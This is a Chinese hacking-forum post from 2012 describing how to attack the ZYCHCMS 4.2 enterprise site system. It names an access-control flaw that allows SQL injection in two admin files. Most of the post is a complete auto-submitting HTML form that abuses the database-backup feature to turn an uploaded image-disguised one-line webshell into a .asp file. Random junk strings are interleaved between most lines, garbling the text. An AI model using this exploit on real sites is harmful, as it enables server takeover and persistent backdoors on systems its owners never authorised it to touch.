中国网络渗透测试联盟
标题:
ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
[打印本页]
作者:
admin
时间:
2012-9-10 21:09
标题:
ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell
- H) E1 p6 l0 e4 e
- h M; i S8 R9 ^% w' f
3 o/ c! z7 j* M; A8 {0 {
" |2 r1 e/ {4 @, r$ ~7 U0 ^8 g
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
' }3 N! X! R1 @$ v2 ~/ t
①SQL注射漏洞
1 |! |# R' n8 L0 \, h- k7 e3 M
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
' C: }8 Y& j, ^
漏洞原因:未过滤
/ S1 w- {2 N! D6 J7 y
漏洞代码:
/ g4 P3 K7 `* ]% U
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
4 E: }7 A& N+ k& T |
修复方法:在文件开头加入代码
' r3 Y1 ^" k6 ^2 k0 ?
- R" W6 N, @' g! R9 X/ p" }2 K
4 r, O9 r& @/ ~) ?/ `+ B1 m# P
②后台拿WBSHELL
* n, N' ~; j- t
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
9 X' G/ I; W: \% ~
这里在网上找了一个,改了下,将就着用。
) x! g" [, d5 y/ H$ V+ g8 t$ A
以下是代码本地提交代码
/ n. b4 K$ r& x" e: A0 @
2 U: A. x0 q1 \0 p* ]) p
" C* J2 |- w# R- W8 [7 R
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
$ [% h0 d3 C6 I; c
<!–eg:
http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup
–>
/ S* G5 _; m* `' U- h- I' E% [
<tr>
- g5 H6 q$ r( I5 H3 P( A
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
/ J/ S! ]7 E% [" Z+ a: K+ E
</tr>
- t1 I1 o6 J [& F2 d
<tr>
; ^& T! ~& A7 d2 t
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>
. A5 H& ]: I6 C- @) B
</span>
; Y9 L5 I X3 D
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
$ J' c& n: |+ v8 H2 c
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
' _* { V" K- x" T! y; J8 H
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
; n& F Q( B9 q$ d+ f- A( f1 b( Z
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
( [6 f) U" ~+ w4 m
<div align=”left”>
# J% l. J% h3 P1 u0 @$ Y( [/ l0 F
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
( Q" r; \0 Q! R/ r% c
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
( {' J9 K/ x' }- Y
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
! |. q; ]8 V" e# u! g
</div></td>
l- h }9 k4 p" x) t
</tr>
& q5 s- M2 C* n1 N9 _
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
. f/ d& @- K/ W2 ?' J% d4 M6 f
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
3 y. E! \# k4 ^+ a. V+ D
<td class=”td”><div align=”left”>
0 f$ ^' O0 R; ^. Y! v3 p+ z
<input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
0 v0 ^8 Y; l0 t" [
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
, r: a) p8 y% b' ^9 C, v
</tr>
; V1 V5 ?) _3 p# @- D; Y3 o# ^
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
( x, U1 Z1 v: j: z! T) G& A
<td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
' B1 f# Y5 g0 S1 F! J( @
<td class=”td”><div align=”left”>
$ T. c3 N( I3 n% ^# T5 ]) Q& l
<input type=”submit” value=”确定备份” class=”btn”
; H% ~/ Q8 A; C- c2 c
</div></td>
1 L5 q, S& |* N9 l
</tr>
# |2 _/ y/ n/ ?& \
</table></td></tr></form>
$ p ~9 ^ a, b% B
</table>
( x% [& ]+ e/ N$ P* |4 |" w
</td>
; E% ?, X6 N( T, n8 V; X6 R
</tr>
+ ~& i" @* \/ X) D$ h
</table>
# l$ Q% d+ v2 t: Q& E% C
<script>
% q& a9 {& W9 d; g2 u/ w- l
document.all.add.submit();
0 J8 Q4 M K4 m+ U' L- j. ?$ r7 s
</script>
4 v, L6 [( G8 g4 m# J# [: ]
; b% g, g" N# |: c
2 t6 m* A d' V
( n9 W, @$ i3 a) i6 X
5 s, F6 h) L7 a* i7 P
/ L* g, ]: Q1 W: Q0 n
+ B( Y, j2 I k7 J, i @9 L# @
, z# C9 w5 Z" T* V3 |: b
+ y/ x- k$ B) {4 x% k }
$ W; j" _0 j& x7 Z, k/ N
' N( r# U* U' b9 j4 `4 j+ b# S
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2